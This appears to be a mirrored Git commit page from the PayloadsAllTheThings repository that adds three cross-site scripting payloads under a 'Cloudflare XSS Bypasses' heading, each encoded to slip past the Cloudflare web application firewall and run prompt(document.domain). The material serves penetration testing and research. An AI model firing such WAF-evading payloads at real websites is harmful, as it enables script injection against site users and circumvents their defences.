mirror of
https://github.com/swisskyrepo/PayloadsAllTheThings.git
synced 2024-11-10 15:14:34 +00:00
Cloudflare XSS Bypasses by Bohdan Korzhynskyi
This commit is contained in:
parent
b031115588
commit
edcac293a8
1 changed files with 8 additions and 0 deletions
|
@ -876,6 +876,14 @@ Works for CSP like `script-src self`
|
|||
|
||||
## Common WAF Bypass
|
||||
|
||||
### Cloudflare XSS Bypasses by [@Bohdan Korzhynskyi](https://twitter.com/h1_ragnar) - 3rd june 2019
|
||||
|
||||
```html
|
||||
<svg onload=prompt%26%230000000040document.domain)>
|
||||
<svg onload=prompt%26%23x000000028;document.domain)>
|
||||
xss'"><iframe srcdoc='%26lt;script>;prompt`${document.domain}`%26lt;/script>'>
|
||||
```
|
||||
|
||||
### Cloudflare XSS Bypass - 22nd march 2019 (by @RakeshMane10)
|
||||
|
||||
```
|
||||
|
|
Loading…
Reference in a new issue